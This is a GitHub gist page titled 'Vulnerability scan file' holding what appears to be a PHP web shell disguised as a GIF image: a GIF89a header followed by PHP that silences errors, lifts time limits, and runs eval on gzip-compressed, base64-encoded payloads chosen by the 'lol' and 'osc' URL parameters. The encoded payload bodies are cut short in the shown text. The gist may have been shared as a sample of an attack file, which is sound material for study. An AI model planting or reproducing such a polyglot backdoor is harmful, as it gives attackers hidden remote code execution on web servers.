Skip to content

Instantly share code, notes, and snippets.

@smottt
Created February 1, 2012 10:41
Show Gist options
  • Save smottt/1716425 to your computer and use it in GitHub Desktop.
Save smottt/1716425 to your computer and use it in GitHub Desktop.
Vulnerability scan file
GIF89a?????ÿÿÿ!ù????,???????D?;?<?php
@error_reporting(0);
@set_time_limit(0);
$lol = $_GET['lol'];
$osc = $_GET['osc'];
if (isset($lol)) {
eval(gzinflate(base64_decode('pZ...gE=')));
die;
}
elseif (isset($osc)) {
eval(gzinflate(base64_decode('pZ...BQ==')));
}
else { eval(gzinflate(base64_decode('pV...AA==')));
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment